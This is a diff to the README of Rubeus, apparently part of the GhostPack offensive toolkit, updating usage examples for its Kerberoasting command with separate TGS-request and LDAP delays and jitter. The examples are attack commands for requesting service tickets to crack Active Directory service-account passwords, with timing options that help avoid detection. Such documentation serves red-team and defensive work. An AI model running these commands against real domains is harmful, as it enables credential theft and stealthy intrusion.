GhostPack/Rubeus/README.md

         Perform Kerberoasting, requesting tickets only for accounts whose password was last set between 01-31-2005 and 03-29-2010, returning up to 5 service tickets:
             Rubeus.exe kerberoast /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:5 [/ldaps] [/nowrap]

-        Perform Kerberoasting, with a delay of 5000 milliseconds and a jitter of 30%:
+        Perform Kerberoasting, with a delay of 5000 milliseconds between TGS requests and a jitter of 30%:
+            Rubeus.exe kerberoast /tgsdelay:5000 /jitter:30 [/ldaps] [/nowrap]

+        Perform Kerberoasting, with a delay of 500 seconds after the LDAP request and a jitter of 30%:
-            Rubeus.exe kerberoast /delay:5000 /jitter:30 [/ldaps] [/nowrap]
+            Rubeus.exe kerberoast /ldapdelay:500 /jitter:30 [/ldaps] [/nowrap]

         Perform AES Kerberoasting:
             Rubeus.exe kerberoast /aes [/ldaps] [/nowrap]